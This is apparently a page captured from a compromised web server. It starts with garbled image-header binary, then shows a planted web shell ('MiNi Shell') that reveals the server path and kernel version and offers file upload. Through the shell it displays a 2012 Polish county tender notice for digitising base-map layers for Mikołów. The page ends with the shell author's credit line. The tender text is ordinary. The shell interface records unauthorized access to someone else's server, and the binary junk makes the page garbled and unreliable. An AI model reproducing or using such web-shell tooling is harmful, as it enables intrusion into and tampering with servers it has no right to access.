JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120704/145269-N-2012.html

<p class="kh_header"><b>Mikołów: Utworzenie numerycznych warstw mapy zasadniczej na potrzeby Bazy Danych Obiektów Topograficznych  BDOT500 z wykorzystaniem istniejących baz danych.</b><br>
<b>Numer ogłoszenia: 145269 - 2012; data zamieszczenia: 04.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Mikołowskiego , ul. Żwirki i Wigury 4a, 43-190 Mikołów, woj. śląskie, tel. (032) 32-48-100,  32-48-125, faks (032) 32-48-147, 32-48-132.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mikolowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie numerycznych warstw mapy zasadniczej na potrzeby Bazy Danych Obiektów Topograficznych  BDOT500 z wykorzystaniem istniejących baz danych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  i zakresem zamówienia jest: utworzenie numerycznych warstw mapy zasadniczej na potrzeby Bazy Danych Obiektów Topograficznych  BDOT500 z wykorzystaniem istniejących baz danych.
1.1 Dane wejściowe do opracowania mapy :
a)	warstwy obiektowe  :
  -  sieć gazowa (shp) ( nie zawierają danych o przyłączach typu LPG)
  -  sieć wodociągowa (Ewmapa)
-	sieć kanalizacyjna (Ewmapa)
-	sieć elektroenergetyczna (Ewmapa)
-	sieć ciepłownicza (Ewmapa)
-	przyziemia budynków wraz z funkcją i nr adresowym  (Ewmapa)
b)  warstwy wektorowe (Ewmapa) :
-	krawędź jezdni, linia zmiany nawierzchni KOU 420
-	krawężnik jezdni KOJ 422
-	krawędź chodnika KOC 423
-	droga nie stanowiąca odrębnej działki KON 424 KSN 425
-	oś toru kolejowego normalnego KOK 427
-	oś toru kolejowego wąskiego KOW 428
-	peron PER 473, PES 474
-	jezdnia KOA 432
-	chodnik KOD 433
-	mosty MST 451, MTS 456, MSD 452, MDS 457
-	kładka dla pieszych PND 453 PNS 458
-	estakada, wiadukt KEM 460
-	przepust PST 413, PSS 414
-	znak i sygnalizacje , SLK 401, SLH 402, PRZ 406 ZND 407, 
							    TBL 408, ZNS 409, SKR 410, PJD  411,
							    SZL 412, SLK 401, SLH 402
-	podpora przewodów trakcyjnych  PTR 430
-	ściana oporowa KOP 449, KOS 450

Jakiekolwiek błędy zauważone w danych wymienionych w punktach a i b należy zaznaczyć na specjalnie utworzonych warstwach jako uwagi. 

c)	pierworysy mapy zasadniczej oraz matryc S i U w skali 1:1000 w następujących ilościach:
-	ok. 560 szt. pierworysów 
-	ok. 800 szt. matryc
d)	barwne ortoobrazy ze zdjęć lotniczych (wykonane w kwietniu 2010 roku) o wynikowej wielkości terenowej piksela do 10 cm.
e)	operaty z pomiarów inwentaryzacyjnych (starsze opracowania): 21 operatów w których pomiarowi podlegały sieci telekomunikacyjne.
f)	w trakcie realizacji poprzedniego zlecenia po zeskanowaniu map wykonawca uzupełnił wyłącznie warstwy wyszczególnione w punkcie 1.1 a i 1.1 b (z wyłączeniem sieci gazowniczej) do Wykonawcy należało będzie uzupełnienie pozostałej części danych zawartych w tych operatach. Ponieważ w trakcie opisywania zamówienia poprzednie jest w trakcie opracowania nie znana jest całkowita ilość operatów jaką należy będzie wprowadzić. Szacowana ilość to                700 szt.
g) wprowadzenie danych z operatów pomiarowych w pełnym zakresie przyjętych do zasobu po przekazaniu baz danych do kontroli przez wykonawcę poprzedniego zlecenia. Szacunkowa ilość to 700 szt.
1.2.Przekazanie materiałów i harmonogram prac 

Z uwagi na fakt, że dane wskazane w punkcie 1.1a i 1.1b dla gmin Łaziska-Górne, Orzesze, Ornontowice, oraz Wyry  przetwarzane są w równoległym zamówieniu rozpoczęcie prac może nastąpić dopiero po przekazaniu i ich kontroli jednak nie później niż w dniu 01.09.2012 roku. 
Prace wykonane zostaną w dwóch głównych etapach :
		I etap: gmina Mikołów					do   01.09.2012r.			II etap: gminy Łaziska Górne, Orzesze, Ornontowice, Wyry	
-	Łaziska Górne 				do 01.11.2012r.
-	Ornontowice, Wyry  			do 01.10.2012r.
-	Orzesze  					do 15.01.2013r.
Termin realizacji całości  zamówienia  01.02.2013r.

3.Zakres oraz warunki realizacji prac

3.1.       Przepisy porządkowe 
-Wykonanie zamówienia wymaga zgłoszenia pracy geodezyjnej w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej w Mikołowie przez osobę posiadającą uprawnienia zawodowe określone w art. 43 pkt. 1 Ustawy Prawo geodezyjne i kartograficzne.
-Opłata za zgłoszenie będzie naliczana w oparciu o załącznik nr 1 tabelę II lp.3 z uwzględnieniem współczynnika 0,01. Rozporządzenia Ministra Infrastruktury z 19.02.2004 r. w sprawie wysokości opłat za czynności geodezyjne i kartograficzne oraz udzielanie informacji, a także za wykonywanie wyrysów i wypisów z operatu ewidencyjnego (Dz.U. Nr 37 poz. 333). W przypadku wprowadzenia w trakcie roboty innego przepisu w sprawie wysokości opłat - zostanie on zastosowany. Materiały niezbędne do wykonania pracy będą wydawane zgodnie z harmonogramem ustalonym z Kierownikiem PODGiK w Mikołowie po podpisaniu umowy i zgłoszeniu roboty.
-Prace będą odbierane etapami zgodnie z harmonogramem robót ustalonym z Zamawiającym, przy czym odbiór następować będzie dla pełnych sekcji w skali 1:1000 w kroju układu 1965 strefa 5 w treści obejmującej całość zamówienia.
3.2. Zakres prac 
Przedmiotem opracowania jest wykonanie kompletnej numerycznej mapy zasadniczej. Numeryczna mapa zasadnicza powstanie przez wektoryzację z analogowej mapy zasadniczej niżej wymienionych elementów :
a)	wykonanie następujących numerycznych obiektowych warstw sieci uzbrojenia terenu (naziemnych i podziemnych) :
-	sieć telekomunikacyjna ( z uwzględnieniem 21 szt. operatów z pomiarów inwentaryzacyjnych sprzed skanowania map)
-	sieć gazowa na podstawie danych przekazanych przez  Górnośląską Spółkę Gazownictwa (format shp)
b)	wykonanie numerycznych wektorowych warstw  w pełnym zakresie mapy zasadniczej (obligatoryjnym i fakultatywnym) z wyłączeniem warstw  wskazanych w punktach 1.1a i 1.1b.
c)	ze względu, że sieć gazowa przekazana została przez Górnośląską Spółkę Gazownictwa w formacie shp należy przekształcić dane do formatu opisanego                  w  punkcie 5.3.5 oraz zaimportować opis przewodów i armatury znajdujące się                     w tabelach atrybutów na warstwy tekstowe. W przypadku stwierdzenia na mapach wystąpienia przewodów gazowych nie objętych opracowaniem otrzymanym od Zamawiającego należy je wprowadzić do bazy a fakt ten odnotować na specjalnie utworzonej warstwie z uwagami.
d)	aktualizacji geometrii na podstawie ortoobrazów podlegać będą budynki, dla których stwierdzono ich przesunięcie względem ortoobrazów o wartość większą od 0,6m . Podczas wykonania warstw wodociągowej, kanalizacyjnej, ciepłowniczej, energetycznej, które były przedmiotem wcześniejszego zamówienia wykonawcę obowiązywała podobna  procedura. Wszystkie przesunięte względem ortoobrazów budynki w atrybutach obiektów muszą mieć zmieniony sposób pozyskania na digitalizacja ze zdjęcia.
e)	aktualizacji geometrii na podstawie ortoobrazów podlegać będą także wszystkie elementy mapy zasadniczej znajdujące się poza terenem objętym szkodami górniczymi, dla których stwierdzono ich przesunięcie względem ortoobrazów                   o wartość większą od 0,5m.
Do wykonawcy będzie należała aktualizacja  szczegółów będących przedmiotem opracowania ze wszystkich operatów przyjętych do zasobu po zeskanowaniu pierworysów i matryc opisanych w punkcie 1.1c, a także aktualizacji warstw otrzymanych od Zamawiającego opisanych w punktach 1.1a i 1.1b. Wykonawca zaktualizuje mapę o wszystkie operaty przekazane do PODGiKu od momentu przekazania baz danych Wykonawcy do czasu przekazania kompletnej mapy Zamawiającemu oraz operaty opisane w punkcie 1.1f i 1.1g.
Przedmiot zamówienia należy wykonać w oparciu o wytyczne techniczne (załącznik nr 2 do SIWZ)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali w okresie ostatnich 3 lat przed upływem terminu składania ofert,  a jeżeli okres  prowadzenia działalności jest krótszy- w tym okresie,  minimum 2 usługi polegające na wykonaniu wektoryzacji mapy zasadniczej w zakresie obejmującym minimum jedną z nakładek tematycznych U lub S dla terenu o powierzchni opracowania minimum 100 km2  dla każdej wykonanej usługi, w tym minimum 1 usługa obejmowała tereny górnicze.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują :
-  minimum 2 osobami posiadającymi uprawnienia zawodowe określone w art. 43 pkt 1 i 2 ustawy z dnia 17 maja 1989r. Prawo Geodezyjne i Kartograficzne (tekst jedn. Dz. U. z 2005r. Nr 240, poz. 2027 z późn. zm.) w zakresie geodezji i kartografii tj. geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne;
- minimum 1 osobą posiadającą uprawnienia zawodowe określone w art. 43 pkt 7 ustawy z dnia 17 maja 1989 r. Prawo Geodezyjne i Kartograficzne (tekst jedn. Dz. U. z 2005r. Nr 240, poz. 2027 z późn. zm.) w zakresie geodezji i kartografii tj. fotogrametria i teledetekcja.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie opisuje tego warunku.
Zgodnie z art. 26 ust. 2b ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
	
II. Inne warunki, które musi spełniać Wykonawca.
Brak podstaw do wykluczenia wykonawcy z powodu niespełnienia warunków, o których mowa w art.24 ust.1 ustawy Prawo Zamówień Publicznych.
	
Ocena spełniania poszczególnych warunków  przez Wykonawców zostanie dokonana na podstawie złożonej oferty oraz złożonych przez wykonawców oświadczeń i dokumentów, wymaganych przez Zamawiającego w ogloszeniu i SIWZ i zostanie przeprowadzona zgodnie z formułą 
-spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1). wypełniony i podpisany formularz ofertowy stanowiący zał. nr  1  do SIWZ
2) Jeżeli oferta podpisana jest przez osobę inną niż upoważniona do reprezentowania wykonawcy do oferty należy załączyć pełnomocnictwo (upoważnienie) w formie oryginału podpisane przez osoby uprawnione do reprezentowania wykonawcy lub w formie kopii poświadczonej notarialnie.
3)w przypadku wykonawców wspólnie ubiegających się o udzialenia zamówienia pełnomocnictwo/upoważnieniem dla pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego.Pełnomocnictwo musi być w formie oryginału lub w formie kopii poświadczonej notarialnie. 
4)w przypadku gdy Wykonawca polega na wiedzy i doświadczeniu , osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów Wykonawca zobowiązany jest do przedstawienia pisemnego zobowiązania tych podmiotów ( np. pisemne oświadczenie podmiotu trzeciego, umowa przedwstępna, umowa generalna o współpracy ) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający może wyrazić zgodę na wprowadzenie zmian postanowień umowy w zakresie:
-ceny brutto określonej w § 4 pkt 2 umowy, o ile zmianie ulegną obowiązujące przepisy regulujące wysokość stawki podatku od towarów i usług, przy czym cena netto określona w §4 pkt 2 nie ulegnie zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Mikołowie, ul.Żwirki i Wigury 4a, 43-190 Mikołow, Biuro Podawcze, wejście B, parter, cena: 10 PLN plus koszt wysyłki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2012 godzina 09:00, miejsce: Starostwo Powiatowe w Mikołowie, ul.Żwirki i Wigury 4a, 43-190 Mikołów, wejście B, parter, pokój nr 127 - kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 14.08.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiającym jest Starosta Mikołowski..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com